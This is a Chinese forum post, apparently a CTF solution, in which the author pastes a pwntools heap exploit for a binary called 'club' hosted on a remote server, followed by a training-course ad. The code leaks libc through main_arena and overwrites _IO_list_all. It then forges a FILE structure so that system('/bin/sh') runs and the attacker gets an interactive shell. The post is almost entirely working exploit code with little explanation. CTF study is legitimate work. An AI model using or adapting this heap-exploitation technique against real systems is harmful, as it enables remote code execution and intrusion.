囧,对我来说太复杂了,东拼西凑居然搞出来了,大家还是看别人的解析吧,我就贴贴代码。
和 free 有关的
各种参考资料
调试工具
from pwn import * context.arch = 'amd64' context.terminal = '/bin/sh' #p = process('./club') #p = gdb.debug("./club") p = remote("123.206.22.95", 8888) def get_box(idx, sz): p.recvuntil("> ") p.send("1") p.recvuntil("> ") p.send(str(idx)) p.recvuntil("> ") p.send(str(sz)) def del_box(idx): p.recvuntil("> ") p.send("2") p.recvuntil("> ") p.send(str(idx)) def set_box(idx, msg): p.recvuntil("> ") p.send("3") p.recvuntil("> ") p.send(str(idx)) assert "\n" not in msg p.send(msg + "\n") def show_box(idx): p.recvuntil("> ") p.send("4") p.recvuntil("> ") p.send(str(idx)) return p.recvline(keepends=False) get_box(3, 1024) get_box(4, 2048) del_box(3) main_arena_88 = u64(show_box(3).ljust(8, "\0")) libc_base = main_arena_88 - 0x3C4B78 IO_list_all = libc_base + 0x3C5520 psystem = libc_base + 0x45390 get_box(2, 480) get_box(1, 464) del_box(2) part2 = u64(show_box(2).ljust(8, "\0")) pbuf = part2 - 960 payload = "/bin/sh\x00" + p64(96) + p64(part2) + p64(pbuf-16) + p64(0) + p64(1) payload = payload.ljust(0xc0, "\0") payload += p64(2**64-1) payload = payload.ljust(0xd8,'\x00') payload += p64(pbuf + 480 + 0xd8 + 8) + p64(0) + p64(0) payload += p64(1) + p64(psystem) payload = payload.ljust(480, "\0") set_box(3, p64(pbuf+480) + p64(IO_list_all-0x10) + p64(0) + p64(0) + "A"*448 + \ payload + \ p64(0) + p64(64) + p64(main_arena_88) + p64(pbuf+480) + p64(0) + p64(0)) get_box(5, 4000) p.interactive()
阿里云开了10几块
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
